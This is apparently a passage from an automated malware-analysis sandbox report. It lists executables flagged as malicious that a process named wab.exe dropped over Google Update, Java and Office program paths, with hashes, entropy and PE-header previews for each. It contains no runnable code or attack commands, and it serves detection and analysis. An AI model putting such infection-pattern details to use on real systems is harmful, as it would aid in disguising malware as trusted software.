                                                                                                SHA-512:FC3A9014266BBDA5AB0AA1A00FEF9096A42B61B8D512045D90B0C702EAFB4A02A5683D686FC962EDF7D88DC48D50E28C16CB1187AEC032D08EC543BD8A4AF1D9
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):443680
                                                                                                Entropy (8bit):6.273434344232977
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:V3gaHC2zUM2WJoROZVXk8hbodzbaw8x0Cx+wnx:Vx5k8hb0Haw+x5x
                                                                                                MD5:8131AEDBC96AF343D27A37721104C7BA
                                                                                                SHA1:169AC23A617F55EC5F1CD091B8C202FA8C145503
                                                                                                SHA-256:FB7BFAF4B58771A348415FCC6E4122ABCA4082C3328A7CBFFEA57215A9C5E005
                                                                                                SHA-512:3D8BAB13EFB2F919677EF26C1C1177BB0FD4C434325B60636C47B9C543061B41C6860912DD18CFF4133A4D27D2C608216682BE25B7B4B79C5DCB03D7A67D5378
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):203552
                                                                                                Entropy (8bit):5.824786358578104
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkCaKavT/DvbEvK9aobNI2B+Nl4jz+b0atWH1TmFtotpcat8iKdlVST31OK8sws:5aK2h9H/B+rEtiPC
                                                                                                MD5:9ABF58ADF874CBD3B1C98C5A8C00952C
                                                                                                SHA1:384560927BED37C8EA188EA513564D6A5D963BC9
                                                                                                SHA-256:7D83AF575B7894583D69E20CDD399EB544D332C954FCB12AEB43A5A6F1DAC047
                                                                                                SHA-512:0A6BC7A997199CB5C9143CF3F43BE8B81E40B58D6AF9DEE68E9919B81253837BC2FD6E68FFB1CDA24AF7BB2F16BE6125842461F2B11E702A74B150A1D236F90A
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):149792
                                                                                                Entropy (8bit):6.130839286683668
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk34vzT+PjZpsB+2h+EOXkMxJ7Rfp8K172YPrp:kpsB+09zMH7cCxPd
                                                                                                MD5:DDB50C235FC41D325CA396E4DADB7D03
                                                                                                SHA1:78447DA5E4E2A5B956AAF7EB1D78381BD18B276A
                                                                                                SHA-256:788B5CA09B6419BF4676C910284222425739E975D3933C7A797A6F7374B1CF4D
                                                                                                SHA-512:BE2091EFC648E42A85E7849A10016AC5F207972C856BF38585E214F6C3A24226D976AA75C93CA6EDD3EFB03A28D65F1FF1B21F8EA2685FA2DB8FC4855CE5D25C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):227104
                                                                                                Entropy (8bit):5.96400865851122
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkmWt9h8QlLISqG+T1Dpd9qEKLmoY46WeJ2B+O3dnDiani3F8I1rXRA/:9Wt9h8QlLISZWVRohcq7dvni3F8QrBA/
                                                                                                MD5:0E040A535A5DAEE44210398E9D623F8A
                                                                                                SHA1:68EAF347AF330274DCCC0163AF3B7BED78FA5130
                                                                                                SHA-256:B1C1D4C7B6831A94636669F6FEEA80A8E74BDCA5AFCF9353E8530F48A903E3A9
                                                                                                SHA-512:867BCC2EE42376C1EFE28A1CDDF55F4363BF058308D0D1DCDF741F6BF48E7201912B9666D30C9E8D75FFEA836BF17E1B4241CE913506FBA3EE48B08523B7D886
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):264480
                                                                                                Entropy (8bit):6.442315114933131
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:7wCtJmRqyFmB6AOKmiMGwIAfx+iQ+FfFyLgG1da6edo:7w6JmRI6Bitwpx+iQafFykG1da6edo
                                                                                                MD5:3396F7DBBB1ED342742ACAD901459B6B
                                                                                                SHA1:43BF682467DC7EE333A6FF5DFF7E44C26A522C31
                                                                                                SHA-256:748DB965A420E06E4439E26B26729B52CB38A8EC1170912EFFE56EB4331EBACE
                                                                                                SHA-512:C04F847FFF847251C182647680041DCC9CF4706A2C4C0EA0F2294A1085880BD01D2154D06C714310D8D604402B6B316428BF9A6A9193DB3E8CDC7CCFA48865AB
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):149792
                                                                                                Entropy (8bit):6.131209533569252
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkr4qR8vSZksB+2hdqecER5AhC48S1m2YPrZ:IksB+0YlEXAe6QPt
                                                                                                MD5:0F315CC3D7FC51F663E1A006F0BFDBDB
                                                                                                SHA1:59A12C582E0D917D4973FF3A79604869101CB322
                                                                                                SHA-256:2948901E015CA1C99F320EF6FA7EB3AE4C21019DBFAD3512D6C88BACF2179229
                                                                                                SHA-512:320E0A4E1F548B1DAA5D3675D8910ED135D0142BCD6A661C8E0D123A0368DF870B6110EE2DED79354C96F3EC23038C4F9E2DA2C9B5E3B483D0F6B0B40F7C5574
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):299136
                                                                                                Entropy (8bit):6.630224066462407
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
                                                                                                MD5:4839E0285791329EE319914A14C4C058
                                                                                                SHA1:CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
                                                                                                SHA-256:06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
                                                                                                SHA-512:D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):135808
                                                                                                Entropy (8bit):5.942801479985879
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoQrmKWGyeVK7qjh3rmKPNbS7cZPxyqPEoCW/ids8nBs+s8nBs8m:/rkpqsyutjZqMNbSgxbFrj8m
                                                                                                MD5:1F06DC6B1D2291AE551234B3109FA2FE
                                                                                                SHA1:0BEA3FB19461017340CA691040D8E3A36F5FE4EF
                                                                                                SHA-256:D7FBD9840C2638B6C3B02BED388863AC27D3DFCB09E50F056868E5CC85F8EE0B
                                                                                                SHA-512:579F76483C73D69ABCAD7CA4B36D2E920A7B81897F95C17E782EAA791783855A37C271CD9A236ED366BE67618D4B443D2D941F69DEC037A101FAB47443418FF0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):299136
                                                                                                Entropy (8bit):6.632805023719349
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
                                                                                                MD5:EBA58103571EA9B107B0F846E6C5A2E7
                                                                                                SHA1:1318DB16558A362755692C6B3A4F9786F5A3CD38
                                                                                                SHA-256:66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
                                                                                                SHA-512:A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):437888
                                                                                                Entropy (8bit):6.304281817676703
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
                                                                                                MD5:9547D26AD745DF9D0CCE708C32590984
                                                                                                SHA1:146AE790CEDE84FA4B245D08B8F057354E39474C
                                                                                                SHA-256:1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
                                                                                                SHA-512:85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):163456
                                                                                                Entropy (8bit):5.9115526693507805
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk6446dewltB2mNd/HOrveW1dexk834fRZ5Nyc:r446d7T/H4X
                                                                                                MD5:D1AF6B8FE233EC36D374D8A19B6CF350
                                                                                                SHA1:54763AEFB38E704722815851C81CCF785A157345
                                                                                                SHA-256:F93DA943A2FFB890D923439A90A7AD11C44D4385426E4AE7B50BA3CCAA271C0A
                                                                                                SHA-512:41A1C1C56AFEA4805A857F5CD7D58C2DD15142003388A93378E63D5F5B5A9206AA78F43F084D1B57894D262F8A58507C33C202454E3D48D3DF7E82E63188FF04
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):127104
                                                                                                Entropy (8bit):5.559603073488415
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoAs8nBs5s8nBskEsz2zy77hPxIAbBsnzA3QDkrDW8Kq5ns8nBsb:/rkkUkEsqzy7pxI8BszFJqkb
                                                                                                MD5:A436A95C872F8E726BE28BD3F28FECA3
                                                                                                SHA1:1B969154E933EE587DD09120290997AEAD912D07
                                                                                                SHA-256:5E454A2DA6110838B52A0E2B6574C113898CBC987175F7DF2D25D91B9CBF3D39
                                                                                                SHA-512:B7859034075CB8FCF718C85BA15864AD764BF615D38C592A584F1F03D1390317A43760EFEED1FCFF44677E90ABB943CA88891008B879277FC529AD24FC833F68
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):223360
                                                                                                Entropy (8bit):5.817153710128924
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk6ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxdTsVcCXFzlZBnD:ZSyMZOy406qS2AroAxnw6f9JCXN1
                                                                                                MD5:0E90F4C1D272BDFD6BF6FFAD932C914F
                                                                                                SHA1:E3979345722CFF61E13670F831832BD0071028C1
                                                                                                SHA-256:F3BC6D48071C74BC60549F00E279DB05B5C95549745422198E362CE8714C443B
                                                                                                SHA-512:852E831A8647F12D88A50260A0F3AF938AE6C7F41D0FAE08B6C8D811B848F41A7317F42618759B3FBFABC004A84D8F3AE5DA9AE5AC4CF8C0F85FF02C03843E8C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):203264
                                                                                                Entropy (8bit):6.382288995818921
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2wl0hzyfN7T34oshWGrAUdaz2w9Lf0M/RHym:WiFIf34hcUsz225/
                                                                                                MD5:A758FF4E11CABD90381BF2DF8C94A835
                                                                                                SHA1:3CF64CC942DABBA8D259C1BBBCAD8A8A5758FAFD
                                                                                                SHA-256:6E96E7D72730FEC7AE5FBE319E54618D70944803BF81CF43381A7FBA3CF213F3
                                                                                                SHA-512:BEF5CECFF18253A3273CA2826AF4B30A373195A8F1ED638A23A87A22BC0EEC0140A498888265B123236315E734C872B459041AA68577CFB264A3ACA3AC521E7D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):209912
                                                                                                Entropy (8bit):6.052889138927242
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                                                MD5:4D184C059578DB44A1F50ECA0F228274
                                                                                                SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                                                SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                                                SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):209912
                                                                                                Entropy (8bit):6.052889138927242
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                                                MD5:4D184C059578DB44A1F50ECA0F228274
                                                                                                SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                                                SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                                                SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):264144
                                                                                                Entropy (8bit):5.5958416454167645
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkaPEGT3EB2e1aWGNU6ITL85x0HRerzJ0YF6OYLy0PPDq29BA+7891:vPEC0QjWGNU6ITL1H0zvjkBA+7891
                                                                                                MD5:44E9513BAB2A6092C7CD0F427E1FEDB4
                                                                                                SHA1:42DD7A45E394541E5741CFA40209724E01F50D7D
                                                                                                SHA-256:E613392D586721152E8B8F90369A483B43EB6E15756FD90327BA2825C0FCD919
                                                                                                SHA-512:93D991C50A228F6F20FB8D1C54AD82DF6409742A8C5BFC4030158CAEDA575C818EF317AA694F08F35112C4D2289FF12DDBD937F954137D5F799AA2476F27DFA2
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):430680
                                                                                                Entropy (8bit):6.507043587745356
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:0mmt0fSoD7ZAOhPiURg/4KAaxZTTlvIfaUcuI4hWxBP9SGO0zyqEL:Jmt0LDdOUO42ZdocuI4kxBgGONqEL
                                                                                                MD5:07C7EC19924DA741A70E2A34F6D38D1C
                                                                                                SHA1:2FA274520A2DE8DF40E463DDB24B74E117250AC0
                                                                                                SHA-256:5679106DE217223E2447D42372E4A17255BF639B15930856A8D15E25CE3E890A
                                                                                                SHA-512:40FF7E018B6EE45F1C16736F692347B1BD7B29D809651AD4F95C8AEB4EB949743E9701ABF1DA31D8ACA34276985A554DFA39EECB6033C569EDFEF500A0302DE6
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4473576
                                                                                                Entropy (8bit):6.558895341897284
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
                                                                                                MD5:4855130B5C1085421920C85105178634
                                                                                                SHA1:A33353F42A13A7250D66326F8770A286E5774729
                                                                                                SHA-256:8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
                                                                                                SHA-512:97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4316096
                                                                                                Entropy (8bit):3.9033569901477474
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:9PNLniBaEJhRELqS/rhwov59SRZ5Vb9sybbsK+0rnsQ:JNLniBPJhRELqS/rhb59SRZ5Vb9sybb9
                                                                                                MD5:A5CA18C848C5701C8854BB35BD56574A
                                                                                                SHA1:005BF3164DF9CA7270124E3AF626845CFE1D09E8
                                                                                                SHA-256:FD61D8809B0673D3B2E54A167F82F37B5345CD65285FACC8DA6C9EAFD6AD4524
                                                                                                SHA-512:DEEF87CC41230B4888A7E0937C8A918B61186372B9ABE36069507C2E5B64976EE74439CA136907AFE11C23B737E8134E342F51412558B3E6CDA4A80610A1DE0E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):94600
                                                                                                Entropy (8bit):5.808950203405244
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VozELjOzHKd1XI/etzCJQx0cxnIO/IOmOe:/rkaE/OTKXI/etG8ICILJ
